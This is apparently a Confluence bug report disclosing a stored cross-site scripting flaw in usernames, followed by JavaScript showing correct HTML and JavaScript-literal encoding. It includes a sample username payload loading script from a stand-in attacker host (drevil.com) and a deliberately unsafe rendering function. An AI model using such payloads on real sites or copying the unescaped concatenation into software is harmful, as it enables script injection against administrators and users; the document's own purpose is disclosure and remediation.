XSS bug: usernames not HTML-encoded in all places

Type atlassian
Reporter jefft
Modified 2017-02-17T05:35:09


When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

Two places I've spotted the raw HTML so far:

  • Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
  • When editing a page created by such a user, the togglePermissions() JavaScript will display it, breaking later tags:
        if ($('edit-personal').checked) $('editPermission').value = "&lt;script src=http://drevil.com/xss&gt;fred&lt;/script&gt;";
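Both rendering sites need a different encoder: the user list is an HTML text context, while togglePermissions() embeds the username inside a JavaScript string literal, where HTML entities are the wrong tool and a raw "</script>" ends the script block. The following is an added example, not Confluence code; renderUnsafe(), renderUserListCell(), renderEditPermissionScript() and isSafeForInlineScript() are hypothetical helpers, and the username is constructed from the one in this report.

```javascript
// Constructed sample: the username from the report.
const USERNAME = '<script src=http://drevil.com/xss>fred</script>';

// HTML text/attribute context (Manage Users -> Show All Users list).
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context (inline <script>). JSON.stringify
// yields a valid, quoted JS literal; <, > and & are additionally written
// as \uXXXX so the emitted source can never contain "</script>" or "<!--",
// which the HTML parser honours even inside a string.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// What the report describes: the username concatenated into the script
// without any escaping, so "</script>" in the value closes the block.
function renderUnsafe(username) {
  return "if ($('edit-personal').checked) $('editPermission').value = \"" +
    username + '";';
}

// Hardened user-list cell: HTML encoding is correct here.
function renderUserListCell(username) {
  return '<td>' + htmlEncode(username) + '</td>';
}

// Hardened inline script: a JS literal, not HTML entities.
function renderEditPermissionScript(username) {
  return "if ($('edit-personal').checked) $('editPermission').value = " +
    jsStringLiteral(username) + ';';
}

// Check a practitioner can run over generated inline-script source: the
// HTML parser terminates a <script> block on "</script" regardless of
// JS string boundaries, and "<!--" / "<script" change its escaping state.
function isSafeForInlineScript(source) {
  return !/<\/script|<script|<!--/i.test(source);
}

// The JS engine decodes the \uXXXX escapes back to the original value,
// so the user sees their username unchanged while the markup stays intact.
function roundTrips(username) {
  return JSON.parse(jsStringLiteral(username)) === username;
}
```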